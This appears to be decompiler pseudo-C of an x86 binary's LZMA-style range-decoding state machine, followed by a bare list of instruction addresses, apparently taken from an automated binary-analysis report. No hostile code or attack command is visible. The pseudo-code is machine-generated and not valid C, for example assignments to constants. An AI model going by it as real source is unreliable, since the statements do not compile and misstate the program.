												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                  0x00000000
                                                  0x00406591
                                                  0x00406591
                                                  0x00406595
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x00406597
                                                  0x00406597
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00406843
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00406a5a
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00406a6b
                                                  0x00406a72
                                                  0x00406a76
                                                  0x00406a76
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406840
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406226
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x0040623d
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00406840
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
